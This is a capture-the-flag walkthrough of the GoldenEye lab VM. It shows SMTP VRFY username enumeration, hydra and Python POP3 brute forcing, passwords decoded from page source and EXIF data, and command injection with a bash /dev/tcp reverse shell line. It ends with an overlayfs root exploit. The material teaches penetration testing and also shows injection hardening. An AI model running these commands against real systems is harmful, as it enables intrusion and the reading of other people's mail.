Vulnhub is such a great resource for vulnerable virtual machines. Sometimes it can be hit or miss with the realism. At times it’s even laughable that the creator thought you’d find a certain flag.

I’m so happy to say that the person who created the GoldenEye box (@_creosote) did not disappoint. If you’re a fan of the original 90’s James Bond flick GoldenEye, then this machine is going to be a nostalgia bomb as well as a fun challenge.

Defining the Attack Surface

nmap 192.168.56.101 -sC -sV -p- -oN full_nmap_scan

Starting out with a full port scan (-p-), the default script scan (-sC) and version detection (-sV). This reveals a few services running:

25: SMTP

80: HTTP

55006: POP3

55007: POP3

It looks like the SMTP server accepts some commands we might use to brute force usernames. I like to find the low hanging fruit first though, so I start with the web server.

VulnHub – GoldenEye Boot2Root

Okay, sweet initial landing page. Let’s follow the navigation instructions.

Looks like we found a login. No creds yet though.

A good rule of thumb is to always look at the source of these pages. You never know what’s hiding in them.

Case in point: if you look at terminal.js, which is linked from the homepage, you find some custom JS written to drive that sweet landing page.

If you read the comments, one of them says:

Boris, make sure you update your default password. My sources say MI6 maybe planning to infiltrate. Be on the lookout for any suspicious network traffic... I encoded you p@ssword below ...

When I use Burp Decoder to decode that password, we get InvincibleHack3r.

From this we can probably safely assume the username is boris.

So I go back to the login page and try the creds boris:InvincibleHack3r.

Interesting, it looks like they’re pointing us at the POP3 servers next.

Finding Credentials and Users

Something fun I think might work on this server is brute forcing the users. I’m not sure if this was cheating or not, but I used a tool called cewl to generate a massive wordlist. It’s great for brute forcing things that you believe are contextual. Since this box is all about the movie GoldenEye, I decided to run cewl over the GoldenEye script to create a wordlist that’s contextual to the movie lol

The way we’re going to brute force the users is by abusing the SMTP server. By inspecting our Nmap output we can see that this server accepts the VRFY command, which asks the server whether a given mailbox exists; that makes it a way to brute force usernames out of the system.

You can also do this attack by hand, but it takes a little longer. We’ll see an example of this later on, but for now we’re going to use the tool smtp-user-enum and give it our wordlist as well as our target.

Sure enough we end up finding two users, boris and natalya. We know boris is a valid login on the web page, but now it appears he is also a Unix user.
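To show what smtp-user-enum is doing under the hood, here is an added example (my own code, not the box’s or the tool’s) that drives VRFY from Python. It starts a fake SMTP server on loopback so it runs offline; the server’s known users, the aliased admin mailbox that answers 252, and the wordlist are all constructed for the demo and are assumptions, not anything taken from the box.

```python
import smtplib
import socketserver
import threading

# Constructed sample data, not the box's accounts: the users the fake server
# knows, one aliased mailbox that draws the ambiguous 252 reply, and a short
# candidate list standing in for the cewl-generated wordlist.
KNOWN_USERS = {"boris", "natalya"}
ALIASED_USERS = {"admin"}
WORDLIST = ["trevelyan", "boris", "admin", "natalya", "xenia", "bond"]


class FakeSMTPHandler(socketserver.StreamRequestHandler):
    """Just enough SMTP (banner, HELO/EHLO, VRFY, QUIT) to drive the client."""

    def _reply(self, line):
        self.wfile.write((line + "\r\n").encode())

    def handle(self):
        self._reply("220 ubuntu ESMTP Postfix (fake, for the demo)")
        while True:
            raw = self.rfile.readline()
            if not raw:
                return
            verb, _, arg = raw.decode(errors="replace").strip().partition(" ")
            verb = verb.upper()
            if verb in ("HELO", "EHLO"):
                self._reply("250 ubuntu")
            elif verb == "VRFY":
                user = arg.strip().strip("<>").split("@")[0].lower()
                if user in KNOWN_USERS:
                    self._reply(f"250 2.1.5 {user}")
                elif user in ALIASED_USERS:
                    self._reply(f"252 2.0.0 {user}")  # "cannot verify, will try delivery"
                else:
                    self._reply(f"550 5.1.1 <{user}>: Recipient address rejected: "
                                "User unknown in local recipient table")
            elif verb == "QUIT":
                self._reply("221 2.0.0 Bye")
                return
            else:
                self._reply("502 5.5.2 Error: command not recognized")


def start_fake_smtp():
    """Serve on an ephemeral loopback port in the background; return (host, port)."""
    server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakeSMTPHandler)
    server.daemon_threads = True
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server.server_address


def vrfy_enumerate(host, port, wordlist, timeout=5):
    """Send one VRFY per candidate over a single connection.

    Returns {candidate: reply_code}. Per RFC 5321, 250/251 confirm a mailbox,
    550/551/553 deny one, and 252 means the server declines to verify and
    will merely attempt delivery, so 252 must not be counted as a hit.
    """
    results = {}
    smtp = smtplib.SMTP(host, port, local_hostname="attacker", timeout=timeout)
    try:
        for candidate in wordlist:
            code, _msg = smtp.verify(candidate)
            results[candidate] = code
    finally:
        smtp.quit()
    return results


def confirmed_users(results):
    """Candidates whose reply positively confirms a local mailbox."""
    return sorted(u for u, code in results.items() if code in (250, 251))


def demo_vrfy():
    host, port = start_fake_smtp()
    results = vrfy_enumerate(host, port, WORDLIST)
    return results, confirmed_users(results)


if __name__ == "__main__":
    results, users = demo_vrfy()
    for candidate, code in results.items():
        print(f"{candidate:<10} {code}")
    print("confirmed users:", users)
```

The point worth carrying over to a real target: only a 250/251 reply is a hit. A 252 means the server will not tell you either way, and counting it as a valid user is how you end up with a wordlist full of false positives.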

You can use netcat to log into POP3 servers.

First I tried logging into the POP3 server with the credentials we know, boris:InvincibleHack3r, but they don’t work, so the mail credentials must be different. Thankfully we can use hydra to brute force the POP3 server.

Using hydra we brute forced not only boris:secret1! but also natalya:bird.

Let’s try and log into the POP3 server again

Sure enough we get in!

I had to look up some documentation to understand the commands needed to retrieve emails, but essentially here they are:

USER <username> <~ Sets the username

PASS <password> <~ Sends the password

STAT <~ Tells you how many messages are available (and their total size)

LIST <~ Tells you each message ID and, I believe, its length

RETR <ID> <~ Retrieves the message and displays it in the console
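Here is an added example (my code, not the box’s mail server or hydra) that does both the hydra step and the retrieval walk-through above with Python’s poplib: try a password list against one account, one fresh connection per attempt, then log in and pull every message with STAT, LIST and RETR. The fake POP3 server, its single account (reusing the boris:secret1! credential from above), its two messages and the password list are constructed for the demo and run on loopback.

```python
import poplib
import socketserver
import threading

# Constructed sample data, not the box's mailbox: one account (the password is
# the one hydra recovered above), two short messages, and a small password
# list standing in for hydra's wordlist.
ACCOUNTS = {"boris": "secret1!"}
MAILBOX = {"boris": [
    "Subject: demo message 1\r\n\r\nFirst constructed message.\r\n",
    "Subject: demo message 2\r\n\r\nSecond constructed message.\r\n",
]}
PASSWORDS = ["password", "goldeneye", "secret1!", "bird"]


class FakePOP3Handler(socketserver.StreamRequestHandler):
    """Minimal POP3 server: USER, PASS, STAT, LIST, RETR, QUIT."""

    def _send(self, text):
        self.wfile.write(text.encode())

    def handle(self):
        user, authed, msgs = None, False, []
        self._send("+OK Dovecot ready (fake, for the demo)\r\n")
        while True:
            raw = self.rfile.readline()
            if not raw:
                return
            verb, _, arg = raw.decode(errors="replace").strip().partition(" ")
            verb = verb.upper()
            if verb == "USER":
                user = arg.strip()
                self._send("+OK\r\n")
            elif verb == "PASS":
                if user is None or ACCOUNTS.get(user) != arg:
                    # Like a real server, hang up after a bad password.
                    self._send("-ERR [AUTH] Authentication failed.\r\n")
                    return
                authed, msgs = True, MAILBOX.get(user, [])
                self._send("+OK Logged in.\r\n")
            elif verb == "QUIT":
                self._send("+OK Logging out.\r\n")
                return
            elif not authed:
                self._send("-ERR Log in first.\r\n")
            elif verb == "STAT":
                self._send(f"+OK {len(msgs)} {sum(len(m) for m in msgs)}\r\n")
            elif verb == "LIST":
                body = "".join(f"{n} {len(m)}\r\n" for n, m in enumerate(msgs, 1))
                self._send(f"+OK {len(msgs)} messages:\r\n{body}.\r\n")
            elif verb == "RETR" and arg.isdigit() and 0 < int(arg) <= len(msgs):
                msg = msgs[int(arg) - 1]
                self._send(f"+OK {len(msg)} octets\r\n{msg}.\r\n")
            else:
                self._send("-ERR Unknown command or bad message number.\r\n")


def start_fake_pop3():
    server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakePOP3Handler)
    server.daemon_threads = True
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server.server_address


def brute_force_pop3(host, port, user, passwords, timeout=5):
    """Try each password on a fresh connection; return the first that logs in."""
    for password in passwords:
        conn = poplib.POP3(host, port, timeout=timeout)
        try:
            conn.user(user)
            conn.pass_(password)
        except poplib.error_proto:
            conn.close()  # "-ERR" on PASS: wrong guess, and the server hung up
            continue
        conn.quit()
        return password
    return None


def fetch_mailbox(host, port, user, password, timeout=5):
    """Log in and pull every message: USER, PASS, STAT, LIST, then RETR each."""
    conn = poplib.POP3(host, port, timeout=timeout)
    try:
        conn.user(user)
        conn.pass_(password)
        count, size = conn.stat()
        _resp, listing, _octets = conn.list()
        messages = []
        for entry in listing:  # each entry is b"<number> <size>"
            _resp, lines, _octets = conn.retr(int(entry.split()[0]))
            messages.append(b"\r\n".join(lines).decode(errors="replace"))
        return count, size, messages
    finally:
        conn.quit()


def demo_pop3():
    host, port = start_fake_pop3()
    password = brute_force_pop3(host, port, "boris", PASSWORDS)
    count, size, messages = fetch_mailbox(host, port, "boris", password)
    return {"password": password, "count": count, "size": size, "messages": messages}


if __name__ == "__main__":
    info = demo_pop3()
    print(f"boris:{info['password']} -> {info['count']} messages, {info['size']} octets")
```

Two things to notice: RETR does not delete anything, so reading someone’s mail this way leaves the mailbox as you found it, and a fresh connection per guess is the honest model of what hydra has to do against a server that drops you after a failed PASS.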

Here are the other two emails I retrieved.

Okay, not a ton that’s useful there other than some great movie references.

Let’s look at Natalya’s emails

The first email isn’t much help, but it does tell us she has GNO privileges on some system when students are assigned.

Ahhhh, here we go: some new creds and a link. It looks like there’s a hostname we need to add to our /etc/hosts file, pointing at the target’s IP.

After we save that file, we can navigate to the URL severnaya-station.com.

Let’s try logging in with Xenia’s credentials

We’re in!

After navigating through the site a little, I came across this file upload and got stuck here _FOR A WHILE_.

Pretty sure this is not the spot for access lol

A little more digging and I found this email from Dr Doak.

My email username is doak

Well, that can’t get much clearer lol. Just to be thorough though, let’s use the same SMTP VRFY trick.

It does appear that doak is a user on the system. Let’s see if we can brute force his credentials with hydra too, like we did for natalya and boris.

SWEET! We got another set of creds, doak:goat. The GOAT, rightfully so.

(Fun fact: Research who Doak is in the movie as well as who he is in real life)

Finding Admin Credentials

Alright, now we can log back into the mail server and see if Doak has anything juicy in his inbox.

Okay, it looks like Dr Doak is speaking directly to us now and giving us his credentials for his account on the training site. If he’s the admin, we may be able to do more than just read posts.

We’re in! And we have a flag 🙂 Though it doesn’t appear Doak is an admin 🙁

Ohhh interesting, so we’re one step away from admin creds I guess.

Let’s check out that image.

So I was hoping for a little more of a challenge here. The first thing I did with this image was run binwalk over it; I guess I was expecting some nested files. That didn’t turn anything up though. Next I ran strings over it.

Looks like there’s a message in the EXIF data, so we can also run exiftool over the image to retrieve it.

It appears the image description contains a base64 encoded string. Decoding it in Burp Decoder gives xWinter1995x!

Now that we have what I believe is the admin password for the training site, let’s log out and log back in with admin:xWinter1995x!
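Both secrets on this box came back from a decoder: the terminal.js comment earlier and the EXIF image description here. The following added example (my code, not Burp’s or the box’s) does the same two decodes offline, and generalises a little by scanning arbitrary text for either encoding. The sample comment text and the base64 string are constructed for the demo; that the terminal.js password is HTML numeric character references (&#NN;) is my assumption, since the page only says it was encoded.

```python
import base64
import binascii
import html
import re

# Constructed samples (the two secrets the page recovers, in the two encodings
# assumed here), not text copied from the box's files.
TERMINAL_JS_COMMENT = (
    "// Boris, make sure you update your default password. I encoded it below: "
    "&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;"
    "&#72;&#97;&#99;&#107;&#51;&#114;"
)
EXIF_IMAGE_DESCRIPTION = "eFdpbnRlcjE5OTV4IQ=="

# Four or more numeric character references in a row (&#73; or &#x49;).
ENTITY_RUN = re.compile(r"(?:&#(?:x[0-9a-fA-F]+|[0-9]+);){4,}")
# A base64 alphabet run of at least 8 chars, optionally padded.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{8,}={0,2}")


def decode_entity_runs(text):
    """Decode every run of HTML numeric character references found in text."""
    return [html.unescape(m.group(0)) for m in ENTITY_RUN.finditer(text)]


def decode_base64_tokens(text):
    """Return base64-looking tokens that decode strictly to printable ASCII.

    Ordinary words are frequent false positives for the regex, so three
    filters are applied: the length must be a multiple of 4, decoding must
    succeed with validate=True (no stray characters), and the bytes must be
    printable ASCII. Everything else is dropped.
    """
    found = []
    for m in B64_TOKEN.finditer(text):
        token = m.group(0)
        if len(token) % 4:
            continue
        try:
            decoded = base64.b64decode(token, validate=True).decode("ascii")
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue
        if decoded.isprintable():
            found.append(decoded)
    return found


if __name__ == "__main__":
    print("terminal.js:", decode_entity_runs(TERMINAL_JS_COMMENT))
    print("EXIF ImageDescription:", decode_base64_tokens(EXIF_IMAGE_DESCRIPTION))
```

Running the base64 scanner over the comment text as well shows why the filters matter: the word "password" is eight valid base64 characters, but it decodes to non-ASCII bytes and is correctly discarded.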

Getting a Shell

I’ll admit that it took me a little bit to get this shell to work. I found the vulnerability immediately after logging in but for some reason it didn’t work for me.

As you make your way through the admin settings, this input pops up under System Paths and it’s extraordinarily tempting looking. It’s clearly being handed to a bash command. Sooooo, why not put our own bash command in? 🙂

Pulling from my favorite FAVORITE resource, the Reverse Shell Cheat Sheet by pentestmonkey, I enter into that highlighted field the command:

/bin/bash -i >& /dev/tcp/192.168.158.1/443 0>&1

Then on my attacking machine I run nc -lvp 443, which opens a listener on port 443.

One caveat: the /dev/tcp redirection in that one-liner is a bash feature, and the redirections are evaluated by whichever shell runs the field, not by the /bin/bash it launches. If that shell turns out to be /bin/sh, wrap the whole thing in a bash -c invocation instead.

This is where I got hung up. The way I believe this was supposed to work was to put in your command and then go to make a post. When you make a post, run the spell check on it and it should run this command. What actually happened was nothing for me haha

I ended up getting it to work by going into the settings and toggling the spell checker service. Once again, I’m not sure if this was an intentional step or not.

Once you do this, go back to the blog post and attempt to run the spell checker again. With the listener already running, your reverse shell command executes and the connection lands in your netcat session.
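The spell checker bug boils down to a configured path being spliced into a shell command line. The added example below (my reconstruction of the pattern, not the training site’s code) shows the vulnerable shape next to a hardened one. /bin/echo stands in for the spell-checker binary so it runs anywhere, the payload is a harmless second command rather than the reverse shell above, and the allowlist of binary paths is an assumption for the demo.

```python
import shlex
import subprocess

# Constructed stand-ins, not the training site's code: /bin/echo plays the
# spell-checker binary so the demo runs anywhere, and the "payload" is a
# harmless extra command instead of the page's reverse shell.
SPELL_BINARY = "/bin/echo"
INJECTED_SETTING = "/bin/echo; echo INJECTED-VIA-SYSTEM-PATHS"

# Assumed allowlist for the demo; a real deployment would list its own paths.
ALLOWED_SPELL_BINARIES = {"/usr/bin/aspell", "/usr/bin/hunspell", SPELL_BINARY}


def vulnerable_spellcheck(spell_binary, text):
    """The pattern the admin panel evidently used: the configured path is
    spliced into a shell command line and run with shell=True. Quoting the
    user's text does not help, because the *setting* is the part the shell
    interprets, so `;`, `|`, `$(...)` and friends in it all work."""
    cmd = f"{spell_binary} {shlex.quote(text)}"
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


def hardened_spellcheck(spell_binary, text):
    """Two independent fixes, either of which stops the page's payload:
    1. the binary must come from a fixed allowlist, so nobody holding admin
       creds can point the setting at an arbitrary program;
    2. argv is passed as a list with shell=False, so no shell ever parses
       the setting or the text, and metacharacters are just bytes."""
    if spell_binary not in ALLOWED_SPELL_BINARIES:
        raise ValueError(f"refusing unexpected spell checker path {spell_binary!r}")
    proc = subprocess.run([spell_binary, text], capture_output=True, text=True)
    return proc.stdout


def injection_blocked(spell_binary, text):
    """True when the hardened path rejects the setting instead of running it."""
    try:
        hardened_spellcheck(spell_binary, text)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable, injected setting:", repr(vulnerable_spellcheck(INJECTED_SETTING, "hello")))
    print("hardened, same setting blocked:", injection_blocked(INJECTED_SETTING, "hello"))
```

Even without the allowlist, the list-form subprocess call alone would turn the injected setting into a single, nonexistent filename; the allowlist is there because "any executable the admin names" is still too much power for a web-editable setting.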

Getting a Root Shell

I waste no time when I’m trying to elevate privileges. I pull down the script LinEnum.sh, which you can find, along with more, on my favorite resources page.

This had a ton of great info, but ultimately it didn’t lead me to the root privesc.

To find that, I had to run the Linux Privilege Escalation Auditing Tool, which you can find here: linux-exploit-suggester.sh

Once you run this tool you’ll see that the machine is vulnerable to an overlayfs privilege escalation. The exploit is already on your attacking machine if you have exploitdb installed.

You just need to run searchsploit overlayfs

which turns up a few candidates.

Now, if you do what I did, you’ll get this C file over to the target machine and attempt to compile it with gcc… then you’ll realize there is no gcc.

After some digging I came across cc installed on the machine, which is a C compiler.

So, naturally, I compiled it and attempted to run it… then it blew up and complained about gcc again.

You’ll need to open this file on your attacking machine and modify some of the code.

As you can see here, inside the code it’s attempting to compile something with gcc, which we now know doesn’t exist on the machine. Just give it `cc` instead and you’ll be good to go. The lesson: check which compilers the target actually has before transferring anything, because an exploit like this needs a compiler twice, once for you to build it and once when it builds its helper at runtime.

Send that sucker back to your target machine, recompile it and run it.

AND WE ARE ROOT!

Summary

I can’t overstate how much fun this machine was considering how big of a part GoldenEye played in my childhood. Every inch of this machine was crawling with nostalgic references. I loved every bit of it. Also, there wasn’t anything too crazy on here. For the most part the exploits were poor configurations and bad password management which we know happens in the real world.

In closing, if you’re a GoldenEye fanboi or fangirl, go check this box out. It’s a great time.
